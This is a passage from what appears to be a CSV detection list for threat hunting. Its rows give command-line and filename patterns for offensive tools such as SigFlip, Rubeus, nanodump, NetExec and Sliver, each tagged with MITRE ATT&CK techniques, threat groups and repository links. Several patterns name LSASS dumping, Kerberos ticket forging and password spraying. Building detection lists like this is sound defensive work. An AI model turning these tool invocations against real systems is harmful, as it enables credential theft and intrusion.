tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* SharpSocks *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* -SharpSpray *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -SharpUp -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -Sharpview *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -sharpweb -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* --shell tcsh exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --shellcode *,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -* --shellcode *--dc-ip *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* --shellcode *--silent*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* --shellcode --remoteinject*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* shodan-api.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --show passwd*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --show_invalid_creds*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* --shtinkering*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* sigflip.*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* sigflip.c *,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* SigFlip.exe*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* SigFlip.PE*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* sigflip.x64.*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* sigflip.x86.*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* SigLoader *,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* --sign-domain *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* --sign-steal *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* Sigwhatever*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -* --silent -obf NixImports -o /tmp/*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* --silent-process-exit *,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* silenttrinity.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -* silver * /domain*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* silver * /ldap *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* silver * /passlastset *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* silver * /service:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* --single shadow.hashes*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* sip-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sip-call-spoof.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sip-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sip-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* sip-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sitadel.py*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -* -SiteListFilePath * -B64Pass *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --skip-crawl*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*- --skippasswordcheck*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --skipregistryloggedon*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* skypev2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sliver sliver*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -* smb * --dpapi *password*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * --gen-relay-list *.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * --lsa --log *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * -M lsassy*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -M masky -o CA=*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -M msol *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 